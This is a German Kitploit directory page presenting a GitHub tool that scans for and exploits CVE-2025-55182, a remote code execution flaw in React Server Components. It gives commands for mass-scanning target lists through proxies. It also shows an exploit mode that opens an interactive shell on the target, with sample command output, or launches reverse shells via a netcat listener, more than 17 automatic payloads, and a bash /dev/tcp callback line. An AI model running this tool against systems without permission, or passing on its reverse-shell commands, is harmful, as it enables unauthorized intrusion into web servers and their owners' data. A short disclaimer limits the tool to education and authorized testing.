Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-55182 — Kritischer RCE-Schwachstellenscanner für React Server Components (CVE-2025-55182). Automatisiertes Exploitation-Framework mit Multi-Payload-Unterstützung, Proxy-Fähigkeiten und interaktiver Befehlsausführung. | Kitploit
Tools/GitHubGitHub/alihzsec/cve-2025-55182
SchwachstellenscannerExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRemote-Access-ToolPayload-Entwicklung
GitHubalihzsec/cve-2025-55182

CVE-2025-55182

Kritischer RCE-Schwachstellenscanner für React Server Components (CVE-2025-55182). Automatisiertes Exploitation-Framework mit Multi-Payload-Unterstützung, Proxy-Fähigkeiten und interaktiver Befehlsausführung.

Repository anzeigen
1513vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-55182 Scanner & Exploiter

[!Warning] Dieses Repository ist ausschließlich für Bildungs- und Forschungszwecke bestimmt.

  • Verwenden Sie die bereitgestellten PoCs ausschließlich auf Systemen, die Ihnen gehören oder für die Sie ausdrückliche Erlaubnis zum Testen haben.
  • Unautorisierter Zugriff, Ausnutzung oder Missbrauch jeglichen Materials in diesem Repository ist illegal.
  • Die Autoren übernehmen keine Verantwortung für Schäden, Missbrauch oder rechtliche Konsequenzen, die aus unsachgemäßer Nutzung resultieren.

🔍 Übersicht

CVE-2025-55182 ist eine kritische Remote-Code-Ausführungsschwachstelle, die React Server Components Versionen 19.0.0, 19.1.0, 19.1.1 und 19.2.0 betrifft. Diese Schwachstelle beruht auf unsicherer Deserialisierung von HTTP-Anfrage-Payloads an Server-Funktionsendpunkte, wodurch nicht authentifizierte Angreifer beliebigen Code remote ausführen können.


🐛 Schwachstellendetails

CVE-ID: CVE-2025-55182
Betroffene Versionen:

  • react-server-dom-webpack 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-turbopack 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-parcel 19.0.0, 19.1.0, 19.1.1, 19.2.0

🚀 Installation

Voraussetzungen

  • Python 3.8 oder höher
  • pip (Python-Paketmanager)

Einrichtung

  1. Repository klonen
root@kitploit:~
git clone https://github.com/AliHzSec/CVE-2025-55182.git
cd CVE-2025-55182
  1. Virtuelle Umgebung erstellen (empfohlen)
root@kitploit:~
python3 -m venv .venv
source .venv/bin/activate
  1. Abhängigkeiten installieren
root@kitploit:~
pip install -r requirements.txt

📖 Verwendung

root@kitploit:~
python3 main.py [-h] (-d | -e) [-u URL] [-l LIST] [-p PROXY | -pl PROXY_LIST] [-t THREADS] [-s]

Argumente

Argumente

ArgumentBeschreibung
-d, --detectionIm Erkennungsmodus ausführen (nach Schwachstellen scannen)
-e, --exploitIm Exploit-Modus ausführen (ein einzelnes Ziel ausnutzen)
-u, --url URLEinzelne Ziel-URL zum Scannen/Ausnutzen
-l, --list FILEDatei mit Liste von Ziel-URLs (nur Erkennungsmodus)
-p, --proxy URLEinzelne Proxy-URL (z.B. http://127.0.0.1:8080)
-pl, --proxy-list FILEDatei mit Liste von Proxy-URLs (eine pro Zeile)
-t, --threads NAnzahl gleichzeitiger Threads (Standard: 10, nur Erkennungsmodus)
-s, --silentStiller Modus - nur anfällige Ziele anzeigen (nur Erkennungsmodus)
-o, --output [FILE]Anfällige Ziele in Datei speichern (nur Erkennungsmodus). Wenn kein Dateiname angegeben, wird Standard verwendet: CVE-2025-55182_Result_YYYYMMDD_HHMMSS.txt
--debugDebug-Logging aktivieren - zeigt Antwortdetails und Wiederholungsversuche (nicht im stillen Modus verfügbar)

🎯 Erkennungsmodus

Ein einzelnes Ziel scannen

root@kitploit:~
python3 main.py -d -u https://example.com

Mehrere Ziele aus einer Datei scannen

root@kitploit:~
python3 main.py -d -l targets.txt

Mit Proxy scannen

root@kitploit:~
python3 main.py -d -l targets.txt -p http://127.0.0.1:8080

Stiller Modus (nur anfällige Ziele ausgeben)

root@kitploit:~
python3 main.py -d -l targets.txt -s

Multithread-Scanning

root@kitploit:~
python3 main.py -d -l targets.txt -t 20

💣 Exploit-Modus

Interaktive Shell

root@kitploit:~
python3 main.py -e -u https://vulnerable-site.com

Wählen Sie dann [i] für die interaktive Shell:

root@kitploit:~
Choose exploitation method:
  [i] Interactive shell
  [r] Reverse shell

Enter your choice (i/r): i

shell> whoami
ec2-user

shell> id
uid=1000(ec2-user) gid=1000(ec2-user) groups=1000(ec2-user)

shell> ls -la
total 48
drwxrwxr-x 5 user user 4096 Dec 7 10:00 .
drwxr-xr-x 3 root root 4096 Dec 1 08:00 ...
..

shell> exit

Reverse Shell

root@kitploit:~
python3 main.py -e -u https://vulnerable-site.com

Wählen Sie dann [r] für die Reverse-Shell und wählen Sie den Payload-Typ:

Option 1: Standard-Payloads (Empfohlen)

root@kitploit:~
Choose exploitation method:
  [i] Interactive shell
  [r] Reverse shell

Enter your choice (i/r): r

Choose payload option:
  [d] Use default payloads (Try multiple reverse shells)
  [c] Provide custom payload

Enter your choice (d/c): d

Enter your IP and port in this format:
Example: 192.168.1.100:4444

IP:PORT> 192.168.1.100:4444

Setup your listener with this command:
nc -lvnp 4444

Press ENTER when your listener is ready...

Das Tool probiert automatisch über 17 verschiedene Reverse-Shell-Payloads aus, bis einer erfolgreich ist.

Option 2: Benutzerdefinierter Payload

root@kitploit:~
Enter your choice (d/c): c

Enter your custom reverse shell payload:
payload> bash -i >& /dev/tcp/10.0.0.1/4444 0>&1

📚 Referenzen

  • Offizielles React-Sicherheitsbulletin
  • Meta-Sicherheitshinweis
  • Vercel-Sicherheitshinweis
  • Next.js-Sicherheitshinweis
  • CVE-Details

Wenn Sie dieses Tool nützlich finden, erwägen Sie bitte, ihm einen Stern zu geben! ⭐
Mit ❤️ für die Sicherheitscommunity gemacht
Tool herunterladen